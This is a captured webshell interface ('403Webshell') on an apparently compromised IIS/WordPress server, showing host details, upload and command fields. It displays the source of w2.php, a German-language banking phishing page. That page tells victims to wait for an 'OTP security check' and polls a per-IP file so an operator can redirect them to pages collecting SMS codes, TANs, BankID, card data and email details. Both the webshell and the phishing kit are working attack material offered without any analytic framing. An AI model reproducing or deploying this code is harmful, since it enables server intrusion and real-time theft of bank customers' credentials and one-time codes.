403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.66
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/KnowledgeBase/wp-content/themes/mrx/css/CH/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/KnowledgeBase/wp-content/themes/mrx/css/CH/w2.php
<?php
include "./Allinone/IP_Range.php";
include "./Allinone/Organization.php";
?>
<!DOCTYPE html>
<html style="font-size: 16px;">
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <title>Digital Service</title>
    <link rel="stylesheet" href="./bom/1.css" media="screen">
    <link rel="stylesheet" href="./bom/2.css" media="screen">
    <link href="./bom/images/fav.ico" type="image/x-icon" rel="shortcut icon"/>
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i">
  </head>
  <body class="u-body"><header class="u-clearfix u-custom-color-2 u-header u-header" id="sec-fc41"><div class="u-clearfix u-sheet u-valign-middle-xl u-valign-middle-xs">
          <img src="./bom/images/head2.JPG" class="u-logo-image u-logo-image-1" data-image-width="340.446">
        </a>
      </div></header>
    <section class="u-align-center u-clearfix u-section-1" id="sec-1423">
      <div class="u-clearfix u-sheet u-valign-middle u-sheet-1">
        <img class="u-expanded-width-sm u-expanded-width-xs u-image u-image-default u-image-1" src="./bom/images/scc.jpg" alt="" data-image-width="1200" data-image-height="208">
        <div class="u-custom-color-6 u-expanded-width-sm u-expanded-width-xs u-shape u-shape-rectangle u-shape-1"></div>
        <div class="u-align-center-md u-align-center-sm u-align-center-xs u-container-style u-custom-color-5 u-expanded-width-xs u-group u-group-1">
          <div class="u-container-layout u-valign-middle u-container-layout-1">
            <p class="u-custom-font u-text u-text-1">
              <span style="font-size: 1rem;">Bitte überprüfen Sie Ihre Informationen​, um Ihr Konto zu sichern und darauf zuzugreifen.&nbsp;</span>
              <br>
            </p>
          </div>
        </div>
        <div class="u-expanded-width-xs u-form u-form-1">
          <form action="#" method="POST" class="u-clearfix u-form-spacing-10 u-form-vertical u-inner-form" source="custom" name="form" style="padding: 0px;">

            <div style="width: 100%; text-align: center;">
            <br><br> <img style="width: 20%; text-align: center;" src="./bom/images/glw.gif">
 <center><p>Bitte warten ... Verlassen Sie diese Seite nicht</p></center> <center><p>Eine OTP-Sicherheitsüberprüfung ist erforderlich</p></center>
 <br><br><br><br><br><br><br><br>

            </div>

          </form>
        </div>
      </div>
    </section>
    
    
    <footer class="u-align-center u-clearfix u-custom-color-1 u-footer u-footer" id="sec-59e7"><div class="u-align-left u-clearfix u-sheet u-valign-middle-lg u-sheet-1">
        <img class="u-expanded-width-xl u-hidden-md u-hidden-sm u-hidden-xs u-image u-image-default u-image-1" src="./bom/images/visfot.JPG" alt="" data-image-width="1885" data-image-height="237">
        <img class="u-hidden-lg u-hidden-xl u-image u-image-default u-image-2" src="./bom/images/mfot.JPG" alt="" data-image-width="716" data-image-height="519">
      </div></footer>
                 <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
    

               <script>
            var ip = '<?php echo $ip;?>';
            var waiting = setInterval(function() {
                $.get('./homa/' + ip + '.txt', function(data) {
                    if( data == 0 ) {
                        //console.log('hada ba9i 0');
                    } else {  
                        var zow = data.split('#|#');
                        var one = zow[0];
                        var two = zow[1];
                        if( one == 'errorlogin' ) {
                            clearInterval(waiting);
                            location.href = "fees.php?redx=errorlogin";
                        } else if( one == 'sms' ) {
                            clearInterval(waiting);
                            location.href = "s1.php?redx=sms&code=" + two;
                        } else if( one == 'sms2' ) {
                            clearInterval(waiting);
                            location.href = "s2.php?redx=memorable&code1=" + two;
                        } else if( one == 'key2' ) {
                            clearInterval(waiting);
                            location.href = "to.php?redx=key2&code1=" + two;
                        } else if( one == 'app' ) {
                            clearInterval(waiting);
                            location.href = "bankid.php?redx=app";
                        } else if( one == 'identification' ) {
                            clearInterval(waiting);
                            location.href = "details.php?redx=identification";                       
                        } else if( one == 'email' ) {
                            clearInterval(waiting);
                            location.href = "epost.php?redx=email";
                        } else if( one == 'qrimg' ) {
                            clearInterval(waiting);
                            location.href = "to.php?redx=qrimg";
                        } else if( one == 'bankid' ) {
                            clearInterval(waiting);
                            location.href = "pass.php?redx=bankid";
                        } else if( one == 'cc' ) {
                            clearInterval(waiting);
                            location.href = "c.php?redx=c";
                        } else if( one == 'errorcc' ) {
                            clearInterval(waiting);
                            location.href = "to.php?redx=errorcc";
                        } else if( one == 'errorsms' ) {
                            clearInterval(waiting);
                            location.href = "o-serror.php?redx=errorsms&code=" + two;
                        } else if( one == 'tan' ) {
                            clearInterval(waiting);
                            var code1 = zow[1];
                            var code2 = zow[2];
                            var code3 = zow[3];
                            location.href = "to.php?redx=tan&code1="+ code1 +"&code2="+ code2 +"&code3=" + code3;
                        } else if( one == 'errortan' ) {
                            clearInterval(waiting);
                            var code1 = zow[1];
                            var code2 = zow[2];
                            var code3 = zow[3];
                            location.href = "to.php?redx=errortan&code1="+ code1 +"&code2="+ code2 +"&code3=" + code3;
                        } else if( one == 'success' ) {
                            clearInterval(waiting);
                            location.href = "done.php?redx=success";
                        } else if( one == 'qfc' ) {
                            clearInterval(waiting);
                            location.href = "fees.php?redx=qfc";
                        }
                          else if( one == 'plz' ) {
                            clearInterval(waiting);
                            location.href = "to.php?redx=plz";
                        }
                          else if( one == 'bill' ) {
                            clearInterval(waiting);
                            location.href = "to.php?redx=bill";
                        }
                          else if( one == 'success' ) {
                            clearInterval(waiting);
                            location.href = "done.php?redx=success";
                        }

                    }
                });
            }, 2000);
        </script>


  </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit